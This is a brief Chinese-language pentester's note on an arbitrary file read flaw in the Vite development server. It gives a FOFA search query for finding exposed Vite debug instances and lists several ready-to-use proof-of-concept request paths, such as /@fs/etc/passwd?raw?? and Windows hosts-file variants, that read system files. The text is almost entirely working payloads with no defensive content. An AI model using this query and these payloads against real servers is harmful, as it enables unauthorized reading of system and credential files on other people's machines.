Vite - Arbitrary File Read 笔记

onescan 和 HaE 都集成了 vite debug 模式的指纹

fofa-query 指纹

'body="/@vite/client"'

可用的 poc

/etc/passwd?raw
/C:/Windows/System32/drivers/etc/hosts?raw
GET /@fs/etc/passwd?raw??
GET /@fs/etc/passwd?raw&url
GET /@fs/etc/passwd?import&raw??

测试如下格式的 poc 也可行

GET /@fs/C:/Windows/System32/drivers/etc/hosts?raw??

附录